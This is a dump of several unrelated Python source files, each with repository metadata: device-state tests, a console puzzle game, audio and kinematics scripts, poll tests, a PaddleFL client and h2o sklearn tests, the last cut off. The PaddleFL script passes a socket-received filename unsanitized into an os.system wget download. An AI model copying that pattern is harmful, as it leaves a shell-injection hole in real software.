# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import time
import wpan
from wpan import verify
#-----------------------------------------------------------------------------------------------------------------------
# Test description: Testing controlling of NCP's MCU power state
test_name = __file__[:-3] if __file__.endswith('.py') else __file__
print '-' * 120
print 'Starting \'{}\''.format(test_name)
#-----------------------------------------------------------------------------------------------------------------------
# Creating `wpan.Nodes` instances
node = wpan.Node()
#-----------------------------------------------------------------------------------------------------------------------
# Init all nodes
wpan.Node.init_all_nodes()
#-----------------------------------------------------------------------------------------------------------------------
# Test implementation
# Verify that state is ON after a reset
verify(node.get(wpan.WPAN_NCP_MCU_POWER_STATE) == wpan.MCU_POWER_STATE_ON)
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Check power state wpantund property get and set
WAIT_TIME = 5
def check_wpan_is_in_offline_state():
verify(node.get(wpan.WPAN_STATE) == wpan.STATE_OFFLINE)
def check_wpan_is_in_deep_sleep_state():
verify(node.get(wpan.WPAN_STATE) == wpan.STATE_DEEP_SLEEP)
def check_wpan_is_in_commissioned_state():
verify(node.get(wpan.WPAN_STATE) == wpan.STATE_COMMISSIONED)
def check_wpan_is_in_associated_state():
verify(node.get(wpan.WPAN_STATE) == wpan.STATE_ASSOCIATED)
def check_wpan_is_in_associating_state():
verify(node.get(wpan.WPAN_STATE) == wpan.STATE_ASSOCIATING)
node.form("mcu-power-state")
verify(node.is_associated())
node.set(wpan.WPAN_NCP_MCU_POWER_STATE, 'low-power')
verify(node.get(wpan.WPAN_NCP_MCU_POWER_STATE) == wpan.MCU_POWER_STATE_LOW_POWER)
verify(node.get(wpan.WPAN_STATE) == wpan.STATE_ASSOCIATED)
node.set(wpan.WPAN_NCP_MCU_POWER_STATE, 'on')
verify(node.get(wpan.WPAN_NCP_MCU_POWER_STATE) == wpan.MCU_POWER_STATE_ON)
node.set(wpan.WPAN_NCP_MCU_POWER_STATE, 'lp') # special short-form string for low-power
verify(node.get(wpan.WPAN_NCP_MCU_POWER_STATE) == wpan.MCU_POWER_STATE_LOW_POWER)
node.set(wpan.WPAN_NCP_MCU_POWER_STATE, wpan.MCU_POWER_STATE_ON)
verify(node.get(wpan.WPAN_NCP_MCU_POWER_STATE) == wpan.MCU_POWER_STATE_ON)
node.set(wpan.WPAN_NCP_MCU_POWER_STATE, wpan.MCU_POWER_STATE_LOW_POWER)
verify(node.get(wpan.WPAN_NCP_MCU_POWER_STATE) == wpan.MCU_POWER_STATE_LOW_POWER)
verify(node.get(wpan.WPAN_STATE) == wpan.STATE_ASSOCIATED)
# Verify that `wpantund` will restore the user-set value after NCP reset
node.reset()
time.sleep(1)
verify(node.get(wpan.WPAN_NCP_MCU_POWER_STATE) == wpan.MCU_POWER_STATE_LOW_POWER)
node.set(wpan.WPAN_NCP_MCU_POWER_STATE, wpan.MCU_POWER_STATE_ON)
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Check the `wpantund` state changes between "deep-sleep" and "offline"
node.leave()
verify(not node.is_associated())
verify(node.get(wpan.WPAN_NCP_MCU_POWER_STATE) == wpan.MCU_POWER_STATE_ON)
verify(node.get(wpan.WPAN_STATE) == wpan.STATE_OFFLINE)
# Setting the power state to `low-power` should change wpantund state to `DEEP_SLEEP`
node.set(wpan.WPAN_NCP_MCU_POWER_STATE, wpan.MCU_POWER_STATE_LOW_POWER)
wpan.verify_within(check_wpan_is_in_deep_sleep_state, WAIT_TIME)
# Verify that reading/getting a property does not impact the wpantund state.
node.get(wpan.WPAN_THREAD_RLOC16)
verify(node.get(wpan.WPAN_NCP_MCU_POWER_STATE) == wpan.MCU_POWER_STATE_LOW_POWER)
verify(node.get(wpan.WPAN_STATE) == wpan.STATE_DEEP_SLEEP)
# Setting the power state to `on` should change wpantund state to `OFFLINE`
node.set(wpan.WPAN_NCP_MCU_POWER_STATE, wpan.MCU_POWER_STATE_ON)
wpan.verify_within(check_wpan_is_in_offline_state, WAIT_TIME)
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Verify the behavior of `begin-low-power` wpanctl command
node.wpanctl('begin-low-power')
wpan.verify_within(check_wpan_is_in_deep_sleep_state, WAIT_TIME)
verify(node.get(wpan.WPAN_NCP_MCU_POWER_STATE) == wpan.MCU_POWER_STATE_LOW_POWER)
node.set(wpan.WPAN_NCP_MCU_POWER_STATE, wpan.MCU_POWER_STATE_ON)
wpan.verify_within(check_wpan_is_in_offline_state, WAIT_TIME)
# Check the `wpantund` state changes between "offline:commissioned" and "deep-sleep"
node.form("test-network")
node.set('Daemon:AutoAssociateAfterReset','0')
# Verify that issuing a `begin-low-power` when in "associated" state
# does not change the state.
node.wpanctl('begin-low-power')
verify(node.get(wpan.WPAN_NCP_MCU_POWER_STATE) == wpan.MCU_POWER_STATE_LOW_POWER)
verify(node.get(wpan.WPAN_STATE) == wpan.STATE_ASSOCIATED)
# After reset, power state should remain `LOW_POWER` (wpantund would restore the value
# on NCP) and since "AutoAssociateAfterReset" is disabled, wpantund state should
# be `DEEP_SLEEP`.
node.reset()
wpan.verify_within(check_wpan_is_in_deep_sleep_state, WAIT_TIME)
node.set(wpan.WPAN_NCP_MCU_POWER_STATE, wpan.MCU_POWER_STATE_ON)
wpan.verify_within(check_wpan_is_in_commissioned_state, WAIT_TIME)
node.set(wpan.WPAN_NCP_MCU_POWER_STATE, wpan.MCU_POWER_STATE_LOW_POWER)
wpan.verify_within(check_wpan_is_in_deep_sleep_state, WAIT_TIME)
node.set(wpan.WPAN_NCP_MCU_POWER_STATE, wpan.MCU_POWER_STATE_ON)
node.leave()
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Verify sleep behavior after disabling `wpantund` ("Daemon:Enabled" property) when state is "offline"
verify(node.get(wpan.WPAN_NCP_MCU_POWER_STATE) == wpan.MCU_POWER_STATE_ON)
verify(node.get(wpan.WPAN_STATE) == wpan.STATE_OFFLINE)
verify(node.get('Daemon:Enabled') == 'true')
# Disabling `wpantund` should put the NCP to deep sleep
node.set('Daemon:Enabled', 'false');
verify(node.get('Daemon:Enabled') == 'false')
wpan.verify_within(check_wpan_is_in_deep_sleep_state, WAIT_TIME)
verify(node.get(wpan.WPAN_NCP_MCU_POWER_STATE) == wpan.MCU_POWER_STATE_LOW_POWER)
# Enabling `wpantund` should update the `MCU_POWER_STATE` back to `ON`.
node.set('Daemon:Enabled', 'true');
wpan.verify_within(check_wpan_is_in_offline_state, WAIT_TIME)
verify(node.get(wpan.WPAN_NCP_MCU_POWER_STATE) == wpan.MCU_POWER_STATE_ON)
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Verify sleep behavior after disabling `wpantund` ("Daemon:Enabled" property) when state is "associated"
node.form("disable-test")
verify(node.is_associated())
verify(node.get(wpan.WPAN_NCP_MCU_POWER_STATE) == wpan.MCU_POWER_STATE_ON)
node.set('Daemon:Enabled', 'false');
verify(node.get('Daemon:Enabled') == 'false')
wpan.verify_within(check_wpan_is_in_deep_sleep_state, WAIT_TIME)
verify(node.get(wpan.WPAN_NCP_MCU_POWER_STATE) == wpan.MCU_POWER_STATE_LOW_POWER)
node.set('Daemon:Enabled', 'true');
wpan.verify_within(check_wpan_is_in_commissioned_state, WAIT_TIME)
verify(node.get(wpan.WPAN_NCP_MCU_POWER_STATE) == wpan.MCU_POWER_STATE_ON)
node.leave()
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Verify `AutoAssociateAfterReset` behavior after reset from "deep-sleep" (but commissioned).
node.set('Daemon:AutoAssociateAfterReset', '1')
node.set(wpan.WPAN_NCP_MCU_POWER_STATE, wpan.MCU_POWER_STATE_LOW_POWER)
verify(node.get(wpan.WPAN_NCP_MCU_POWER_STATE) == wpan.MCU_POWER_STATE_LOW_POWER)
node.form("resume-test")
verify(node.is_associated())
verify(node.get(wpan.WPAN_NCP_MCU_POWER_STATE) == wpan.MCU_POWER_STATE_LOW_POWER)
node.reset()
# After reset, power state should remain `LOW_POWER` (wpantund would restore the value
# on NCP) and wpantund state should start as "deep-sleep" but since AutoAssociateAfterReset
# is enabled, network should be recovered.
wpan.verify_within(check_wpan_is_in_associating_state, WAIT_TIME)
verify(node.get(wpan.WPAN_NCP_MCU_POWER_STATE) == wpan.MCU_POWER_STATE_LOW_POWER)
#-----------------------------------------------------------------------------------------------------------------------
# Test finished
wpan.Node.finalize_all_nodes()
print '\'{}\' passed.'.format(test_name)
| [
"[email protected]"
] | |
415935edef31996e2b359804e324f5f7b3d48614 | ab9b75fcdd2b7352968886e5ed41ee7788216226 | /src/gamesbyexample/stickyhands.py | a1af5601756ea83263f3a20e8dd2bb26220102ac | [
"MIT"
] | permissive | mgocken/PythonStdioGames | d7b48cafbc33a027548cab08ad08aea6c0c81abd | 036d2f142581fb74a38400721aecce15a695e1bc | refs/heads/master | 2020-09-29T18:35:34.589307 | 2019-12-06T00:15:46 | 2019-12-06T00:15:46 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,528 | py | # Sticky Hands, by Al Sweigart [email protected]
# A jewel-stealing, movement puzzle game.
__version__ = 1
# Inspired by Herding Cats https://w.itch.io/herding-cats
# TODO - Enter R to reset the entire level.
import copy, os, sys
# Setup the constants:
WALL = chr(9608)
FACE = chr(9786)
DIAMOND = chr(9830)
CHAR_MAP = {'#': WALL, '@': FACE, '$': DIAMOND, ' ': ' '} # TODO add comment
# Display the title banner and instructions:
print('''Sticky Hands: A diamond collecting game.
By Al Sweigart [email protected]
Pick up diamonds by standing next to them. Stuck diamonds also
become sticky. Try to stick every diamond in the level.
Enter WASD letters to move, numbers to switch levels, U to undo a
move, or "quit" to quit the game. You can enter multiple WASD or U
letters to make several moves at once.
''')
# Load each level from stickyhandslevels.txt
if not os.path.exists('stickyhandslevels.txt'):
print('Download the level file from https://github.com/asweigart/PythonStdioGames/blob/master/src/stickyhandslevels.txt')
sys.exit()
ALL_LEVELS = []
with open('stickyhandslevels.txt') as levelFile:
currentLevelFromFile = {'width': 0, 'height': 0, 'diamonds': 0} # Each level is represented by a dictionary.
y = 0
for line in levelFile.readlines():
if line.startswith(';'):
continue # Ignore comments in the level file.
if line == '\n':
if currentLevelFromFile == {'width': 0, 'height': 0, 'diamonds': 0}:
continue # Ignore this line, and continue to the next line.
# Finished with the current level:
ALL_LEVELS.append(currentLevelFromFile)
currentLevelFromFile = {'width': 0, 'height': 0, 'diamonds': 0}
y = 0 # Reset y back to 0.
continue
# Add the line to the current level.
# We use line[:-1] so we don't include the newline:
for x, levelChar in enumerate(line[:-1]):
currentLevelFromFile[(x, y)] = levelChar
# Keep track of how many diamonds are in the level:
if levelChar == '$':
currentLevelFromFile['diamonds'] += 1
y += 1
if len(line) - 1 > currentLevelFromFile['width']:
currentLevelFromFile['width'] = len(line) - 1
if y > currentLevelFromFile['height']:
currentLevelFromFile['height'] = y
def drawLevel(levelNum, levelData):
# Draw the current level.
print('Level #' + str(levelNum + 1), 'of', len(ALL_LEVELS))
for y in range(levelData['height']):
for x in range(levelData['width']):
prettyChar = CHAR_MAP[levelData.get((x, y), ' ')]
print(prettyChar, end='')
print()
def getPlayerBlobPoints(levelData, playerx, playery):
playerBlob = [(playerx, playery)]
pointsToCheck = [(playerx, playery)]
alreadyCheckedPoints = []
while len(pointsToCheck) > 0:
x, y = pointsToCheck.pop()
alreadyCheckedPoints.append((x, y))
if (x - 1, y) not in alreadyCheckedPoints and levelData[(x - 1, y)] == '$':
playerBlob.append((x - 1, y))
pointsToCheck.append((x - 1, y))
if (x + 1, y) not in alreadyCheckedPoints and levelData[(x + 1, y)] == '$':
playerBlob.append((x + 1, y))
pointsToCheck.append((x + 1, y))
if (x, y - 1) not in alreadyCheckedPoints and levelData[(x, y - 1)] == '$':
playerBlob.append((x, y - 1))
pointsToCheck.append((x, y - 1))
if (x, y + 1) not in alreadyCheckedPoints and levelData[(x, y + 1)] == '$':
playerBlob.append((x, y + 1))
pointsToCheck.append((x, y + 1))
return playerBlob
currentLevelNumber = 0
currentLevel = copy.copy(ALL_LEVELS[currentLevelNumber])
undoStack = [copy.copy(currentLevel)]
while True: # Main game loop.
drawLevel(currentLevelNumber, currentLevel)
# Get the input from the player:
moves = input('Enter moves> ').upper()
if moves == 'QUIT':
print('Thanks for playing!')
sys.exit()
if moves.isdecimal():
if not (1 <= int(moves) < len(ALL_LEVELS)):
print('Enter a level number between 1 and', len(ALL_LEVELS))
continue
# Change the current level:
currentLevelNumber = int(moves) - 1
currentLevel = copy.copy(ALL_LEVELS[currentLevelNumber])
undoStack = [copy.copy(currentLevel)]
continue
# Validate the input; make sure it only has W, A, S, D, or U:
movesAreValid = True
for move in moves:
if move not in ('W', 'A', 'S', 'D', 'U'):
movesAreValid = False
print(move, 'is not a valid move.')
break
if not movesAreValid:
continue
# Carry out the moves:
for move in moves:
# Find the player position:
for position, character in currentLevel.items():
if character == '@':
playerx, playery = position
if move == 'U':
if len(undoStack) == 1:
continue # Can't undo past the first move.
undoStack.pop() # Remove the last item from the undoStack list.
currentLevel = copy.copy(undoStack[-1])
continue
if move == 'W':
movex, movey = 0, -1
elif move == 'A':
movex, movey = -1, 0
elif move == 'S':
movex, movey = 0, 1
elif move == 'D':
movex, movey = 1, 0
playerBlob = getPlayerBlobPoints(currentLevel, playerx, playery)
blobCanMove = True
for blobPoint in playerBlob:
blobx, bloby = blobPoint[0], blobPoint[1]
moveToSpace = currentLevel.get((blobx + movex, bloby + movey), ' ')
# If the move-to space is a wall, don't move at all:
if moveToSpace == '#':
blobCanMove = False
break
if blobCanMove:
newBlobPoints = []
for blobPoint in playerBlob:
blobx, bloby = blobPoint[0], blobPoint[1]
# If the move-to space is empty or a goal, just move there:
if currentLevel[(blobx, bloby)] == '@':
currentLevel[(blobx, bloby)] = ' '
newBlobPoints.append((blobx + movex, bloby + movey, '@'))
elif currentLevel[(blobx, bloby)] == '$':
currentLevel[(blobx, bloby)] = ' '
newBlobPoints.append((blobx + movex, bloby + movey, '$'))
for newBlobPoint in newBlobPoints:
# Set the player's new position:
currentLevel[(newBlobPoint[0], newBlobPoint[1])] = newBlobPoint[2] # TODO - refactor this.
# Save the state of the level for the undo feature:
undoStack.append(copy.copy(currentLevel))
# Check if the player has finished the level:
levelIsSolved = False
playerBlob = getPlayerBlobPoints(currentLevel, playerx + movex, playery + movey)
if len(playerBlob) - 1 == currentLevel['diamonds']:
levelIsSolved = True
if levelIsSolved:
drawLevel(currentLevelNumber, currentLevel)
print('Level complete!')
input('Press Enter to continue...')
currentLevelNumber = (currentLevelNumber + 1) % len(ALL_LEVELS)
currentLevel = copy.copy(ALL_LEVELS[currentLevelNumber])
undoStack = [copy.copy(currentLevel)]
break # Don't carry out any remaining moves.
| [
"[email protected]"
] | |
02e1b1ac9d7ca0fcf0fa59318c57df5d46403f9d | 16809bf25066488f2f32f154dadef3e30c68ae68 | /sine_wave.py | 0ed35aeb1f8d136868fdb4c3053a10605cc1bcdf | [] | no_license | aidiary/signal_processing | 0db6d1a9662ccd0fe232ccc461e9b27174c8ef88 | 4c1cb8ceee3a1527f38b8dbf9ffa1a737d06b577 | refs/heads/master | 2021-01-13T03:44:32.721301 | 2016-12-23T13:40:10 | 2016-12-23T13:40:10 | 77,221,395 | 1 | 2 | null | null | null | null | UTF-8 | Python | false | false | 1,762 | py | #coding: utf-8
import wave
import struct
import numpy as np
from pylab import *
def createSineWave (A, f0, fs, length):
"""振幅A、基本周波数f0、サンプリング周波数 fs、
長さlength秒の正弦波を作成して返す"""
data = []
# [-1.0, 1.0]の小数値が入った波を作成
for n in arange(length * fs): # nはサンプルインデックス
s = A * np.sin(2 * np.pi * f0 * n / fs)
# 振幅が大きい時はクリッピング
if s > 1.0: s = 1.0
if s < -1.0: s = -1.0
data.append(s)
# [-32768, 32767]の整数値に変換
data = [int(x * 32767.0) for x in data]
# plot(data[0:100]); show()
# バイナリに変換
data = struct.pack("h" * len(data), *data) # listに*をつけると引数展開される
return data
def play (data, fs, bit):
import pyaudio
# ストリームを開く
p = pyaudio.PyAudio()
stream = p.open(format=pyaudio.paInt16,
channels=1,
rate=int(fs),
output= True)
# チャンク単位でストリームに出力し音声を再生
chunk = 1024
sp = 0 # 再生位置ポインタ
buffer = data[sp:sp+chunk]
while buffer != '':
stream.write(buffer)
sp = sp + chunk
buffer = data[sp:sp+chunk]
stream.close()
p.terminate()
def save(data, fs, bit, filename):
"""波形データをWAVEファイルへ出力"""
wf = wave.open(filename, "w")
wf.setnchannels(1)
wf.setsampwidth(bit / 8)
wf.setframerate(fs)
wf.writeframes(data)
wf.close()
if __name__ == "__main__" :
data = createSineWave(0.25, 250, 8000.0, 1.0)
play(data, 8000, 16)
save(data, 8000, 16, "sine.wav")
| [
"[email protected]"
] | |
deb27eae24f4cd46475211751438e904854e037a | fcdfe976c9ed60b18def889692a17dc18a8dd6d7 | /ros/py_ros/kdl_test2.py | 120f3dc29d4eeaee751accf468dd08397df344f3 | [] | no_license | akihikoy/ay_test | 4907470889c9bda11cdc84e8231ef3156fda8bd7 | a24dfb720960bfedb94be3b4d147e37616e7f39a | refs/heads/master | 2023-09-02T19:24:47.832392 | 2023-08-27T06:45:20 | 2023-08-27T06:45:20 | 181,903,332 | 6 | 3 | null | null | null | null | UTF-8 | Python | false | false | 1,517 | py | #!/usr/bin/python
#\file kdl_test2.py
#\brief certain python script
#\author Akihiko Yamaguchi, [email protected]
#\version 0.1
import numpy as np
from kdl_kin import TKinematics
if __name__=='__main__':
np.set_printoptions(precision=3)
print 'Testing TKinematics (robot_description == Yaskawa Motoman is assumed).'
print 'Before executing this script, run:'
print ' rosparam load `rospack find motoman_sia10f_support`/urdf/sia10f.urdf robot_description'
kin= TKinematics(end_link='link_t')
kin.print_robot_description()
DoF= len(kin.joint_names)
q0= [0.0]*DoF
angles= {joint:q0[j] for j,joint in enumerate(kin.joint_names)} #Deserialize
x0= kin.forward_position_kinematics(angles)
print 'q1=',np.array(q1)
print 'x0= FK(q0)=',x0
import random
q1= [3.0*(random.random()-0.5) for j in range(DoF)]
angles= {joint:q1[j] for j,joint in enumerate(kin.joint_names)} #Deserialize
x1= kin.forward_position_kinematics(angles)
print 'q1=',q1
print 'x1= FK(q1)=',x1
seed= [0.0]*DoF
#seed= [3.0*(random.random()-0.5) for j in range(DoF)]
q2= kin.inverse_kinematics(x1[:3], x1[3:], seed=seed, maxiter=2000, eps=1.0e-4) #, maxiter=500, eps=1.0e-6
print 'q2= IK(x1)=',q2
if q2 is not None:
angles= {joint:q2[j] for j,joint in enumerate(kin.joint_names)} #Deserialize
x2= kin.forward_position_kinematics(angles)
print 'x2= FK(q2)=',x2
print 'x2==x1?', np.allclose(x2,x1)
print '|x2-x1|=',np.linalg.norm(x2-x1)
else:
print 'Failed to solve IK.'
| [
"[email protected]"
] | |
862323cdd250fded22470d58b5b961390e8c4680 | 88748ec85d537e4b50ba45a255a0dcc3c154116f | /tests/unit/test_poll.py | 2810d41f352a9741f36504ab9e9b2f71976b5c96 | [
"MIT"
] | permissive | byrgazov/vanilla | 17c53843b1b2f6b5484e4ff8e2fab54123245cc0 | 2896ae049d9e58ef3b4008a869ebf481951d0780 | refs/heads/master | 2020-07-30T12:30:04.497223 | 2020-07-24T10:08:03 | 2020-07-24T10:08:03 | 210,235,284 | 0 | 0 | MIT | 2019-09-23T00:49:06 | 2019-09-23T00:49:06 | null | UTF-8 | Python | false | false | 1,731 | py | import os
import vanilla.poll
class TestPoll(object):
def test_poll(self):
poll = vanilla.poll.Poll()
r, w = os.pipe()
poll.register(r, vanilla.poll.POLLIN)
assert poll.poll(timeout=0) == []
os.write(w, '1')
assert poll.poll() == [(r, vanilla.poll.POLLIN)]
# test event is cleared
assert poll.poll(timeout=0) == []
# test event is reset on new write after read
assert os.read(r, 4096) == '1'
assert poll.poll(timeout=0) == []
os.write(w, '2')
assert poll.poll() == [(r, vanilla.poll.POLLIN)]
assert poll.poll(timeout=0) == []
# test event is reset on new write without read
os.write(w, '3')
assert poll.poll() == [(r, vanilla.poll.POLLIN)]
assert poll.poll(timeout=0) == []
assert os.read(r, 4096) == '23'
def test_write_close(self):
poll = vanilla.poll.Poll()
r, w = os.pipe()
poll.register(r, vanilla.poll.POLLIN)
poll.register(w, vanilla.poll.POLLOUT)
assert poll.poll() == [(w, vanilla.poll.POLLOUT)]
assert poll.poll(timeout=0) == []
os.close(w)
assert poll.poll() == [(r, vanilla.poll.POLLERR)]
assert poll.poll(timeout=0) == []
def test_read_close(self):
poll = vanilla.poll.Poll()
r, w = os.pipe()
poll.register(r, vanilla.poll.POLLIN)
poll.register(w, vanilla.poll.POLLOUT)
assert poll.poll() == [(w, vanilla.poll.POLLOUT)]
assert poll.poll(timeout=0) == []
os.close(r)
got = poll.poll()
assert got == [(w, vanilla.poll.POLLOUT), (w, vanilla.poll.POLLERR)]
assert poll.poll(timeout=0) == []
| [
"[email protected]"
] | |
c008d92d5264518d006a4ff9b43acef4f19e4c38 | 30b004cad2c14b47b5f66c3a4a0015e05ca4a27e | /contrib/data_safety_training/image_classification/submitter.py | 920b60ad8fed2d7ff0b13d17001d8227f3b0abb8 | [
"Apache-2.0"
] | permissive | PaddlePaddle/PaddleFL | 66c26f774eeadc25c12e74056ac389e0c1f61b84 | dcc00c5dff62c3dd0092801f4e9b89d8c0957d3d | refs/heads/master | 2023-08-07T22:05:24.806573 | 2023-03-21T01:15:10 | 2023-03-21T01:15:10 | 210,873,203 | 486 | 136 | Apache-2.0 | 2023-07-26T22:30:57 | 2019-09-25T15:01:39 | Python | UTF-8 | Python | false | false | 1,090 | py | # Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import zmq
import socket
import msgpack
import os
mission_dict = {"mission": "image classification", "image_size": [3, 32, 32]}
#send request
context = zmq.Context()
zmq_socket = context.socket(zmq.REQ)
zmq_socket.connect("tcp://127.0.0.1:60001")
zmq_socket.send(msgpack.dumps(mission_dict))
#get and download encoder
file = zmq_socket.recv()
os.system("wget 127.0.0.1:8080/{}".format(file))
#data encoding
os.system("python -u user.py > user.log")
zmq_socket.send("complete")
| [
"[email protected]"
] | |
a31688d8579cfce253b6dac4f680333340f6b0e4 | 0bde5f7f09aa537ed1f4828d4e5ebee66475918f | /h2o-py/tests/testdir_sklearn/pyunit_sklearn_params.py | 2a70a91baafd68393e95b43969166ffea1f8a2ea | [
"Apache-2.0"
] | permissive | Winfredemalx54/h2o-3 | d69f1c07e1f5d2540cb0ce5e6073415fa0780d32 | dfb163c82ff3bfa6f88cdf02465a9bb4c8189cb7 | refs/heads/master | 2022-12-14T08:59:04.109986 | 2020-09-23T08:36:59 | 2020-09-23T08:36:59 | 297,947,978 | 2 | 0 | Apache-2.0 | 2020-09-23T11:28:54 | 2020-09-23T11:28:54 | null | UTF-8 | Python | false | false | 7,702 | py | from __future__ import print_function
import os, sys
from sklearn.pipeline import Pipeline
from h2o.sklearn import H2OAutoMLEstimator, H2OGradientBoostingEstimator, H2OScaler, H2OPCA
sys.path.insert(1, os.path.join("..",".."))
from tests import pyunit_utils
seed = 2019
def test_all_params_are_visible_in_get_params():
pipeline = Pipeline([
('standardize', H2OScaler(center=True, scale=False)),
('pca', H2OPCA(k=2, seed=seed)),
('estimator', H2OGradientBoostingEstimator(ntrees=20, max_depth=5, seed=seed))
])
params = pipeline.get_params()
assert isinstance(params['standardize'], H2OScaler)
assert params['standardize__center'] is True
assert params['standardize__scale'] is False
assert isinstance(params['pca'], H2OPCA)
assert params['pca__k'] == 2
assert params['pca__seed'] == seed
assert isinstance(params['estimator'], H2OGradientBoostingEstimator)
assert params['estimator__ntrees'] == 20
assert params['estimator__max_depth'] == 5
assert params['estimator__seed'] == seed
# also the ones that were not set explicitly
assert params['pca__max_iterations'] is None
assert params['estimator__learn_rate'] is None
def test_all_params_can_be_set_using_set_params():
pipeline = Pipeline([
('standardize', H2OScaler()),
('pca', H2OPCA()),
('estimator', H2OGradientBoostingEstimator())
])
pipeline.set_params(
standardize__center=True,
standardize__scale=False,
pca__k=2,
pca__seed=seed,
estimator__ntrees=20,
estimator__max_depth=5,
estimator__seed=seed
)
assert isinstance(pipeline.named_steps.standardize, H2OScaler)
assert pipeline.named_steps.standardize.center is True
assert pipeline.named_steps.standardize.scale is False
assert isinstance(pipeline.named_steps.pca, H2OPCA)
assert pipeline.named_steps.pca.k == 2
assert pipeline.named_steps.pca.seed == seed
assert isinstance(pipeline.named_steps.estimator, H2OGradientBoostingEstimator)
assert pipeline.named_steps.estimator.ntrees == 20
assert pipeline.named_steps.estimator.max_depth == 5
assert pipeline.named_steps.estimator.seed == seed
def test_all_params_are_accessible_as_properties():
pipeline = Pipeline([
('standardize', H2OScaler(center=True, scale=False)),
('pca', H2OPCA(k=2, seed=seed)),
('estimator', H2OGradientBoostingEstimator(ntrees=20, max_depth=5, seed=seed))
])
assert isinstance(pipeline.named_steps.standardize, H2OScaler)
assert pipeline.named_steps.standardize.center is True
assert pipeline.named_steps.standardize.scale is False
assert isinstance(pipeline.named_steps.pca, H2OPCA)
assert pipeline.named_steps.pca.k == 2
assert pipeline.named_steps.pca.seed == seed
assert isinstance(pipeline.named_steps.estimator, H2OGradientBoostingEstimator)
assert pipeline.named_steps.estimator.ntrees == 20
assert pipeline.named_steps.estimator.max_depth == 5
assert pipeline.named_steps.estimator.seed == seed
# also the ones that were not set explicitly
assert pipeline.named_steps.pca.max_iterations is None
assert pipeline.named_steps.estimator.learn_rate is None
def test_all_params_can_be_set_as_properties():
pipeline = Pipeline([
('standardize', H2OScaler()),
('pca', H2OPCA()),
('estimator', H2OGradientBoostingEstimator())
])
pipeline.named_steps.standardize.center = True
pipeline.named_steps.standardize.scale = False
pipeline.named_steps.pca.k = 2
pipeline.named_steps.pca.seed = seed
pipeline.named_steps.estimator.ntrees = 20
pipeline.named_steps.estimator.max_depth = 5
pipeline.named_steps.estimator.seed = seed
params = pipeline.get_params()
assert isinstance(params['standardize'], H2OScaler)
assert params['standardize__center'] is True
assert params['standardize__scale'] is False
assert isinstance(params['pca'], H2OPCA)
assert params['pca__k'] == 2
assert params['pca__seed'] == seed
assert isinstance(params['estimator'], H2OGradientBoostingEstimator)
assert params['estimator__ntrees'] == 20
assert params['estimator__max_depth'] == 5
assert params['estimator__seed'] == seed
def test_params_conflicting_with_sklearn_api_are_still_available():
pca = H2OPCA()
assert pca.transform != 'NONE'
assert callable(pca.transform), "`transform` method from sklearn API has been replaced by a property"
# conflicting param can be accessed normally using get_params()
assert pca.get_params()['transform'] == 'NONE'
# property is accessible directly using a trailing underscore
assert pca.transform_ == 'NONE'
pca = H2OPCA(transform='DEMEAN')
assert callable(pca.transform), "`transform` method from sklearn API has been replaced by a property"
assert pca.get_params()['transform'] == 'DEMEAN'
assert pca.transform_ == 'DEMEAN'
# conflicting param can be modified normally using set_params()
pca.set_params(transform='DESCALE')
assert pca.get_params()['transform'] == 'DESCALE'
assert pca.transform_ == 'DESCALE'
# conflicting property can be set directly using a trailing underscore
pca.transform_ = 'NORMALIZE'
assert pca.get_params()['transform'] == 'NORMALIZE'
assert pca.transform_ == 'NORMALIZE'
def test_params_are_correctly_passed_to_underlying_transformer():
pca = H2OPCA(seed=seed)
pca.set_params(transform='DEMEAN', k=3)
pca.model_id = "dummy"
assert pca.estimator is None
pca._make_estimator() # normally done when calling `fit`
assert pca.estimator
parms = pca.estimator._parms
assert parms['seed'] == seed
assert parms['transform'] == 'DEMEAN'
assert parms['k'] == 3
assert parms['model_id'] == "dummy"
assert parms['max_iterations'] is None
def test_params_are_correctly_passed_to_underlying_estimator():
estimator = H2OGradientBoostingEstimator(seed=seed)
estimator.set_params(max_depth=10, learn_rate=0.5)
estimator.model_id = "dummy"
assert estimator.estimator is None
estimator._make_estimator() # normally done when calling `fit`
real_estimator = estimator.estimator
assert real_estimator
parms = real_estimator._parms
assert real_estimator.seed == parms['seed'] == seed
assert real_estimator.max_depth == parms['max_depth'] == 10
assert real_estimator.learn_rate == parms['learn_rate'] == 0.5
assert real_estimator._id == parms['model_id'] == "dummy"
assert real_estimator.training_frame == parms['training_frame'] is None
def test_params_are_correctly_passed_to_underlying_automl():
estimator = H2OAutoMLEstimator(seed=seed)
estimator.set_params(max_models=5, nfolds=0)
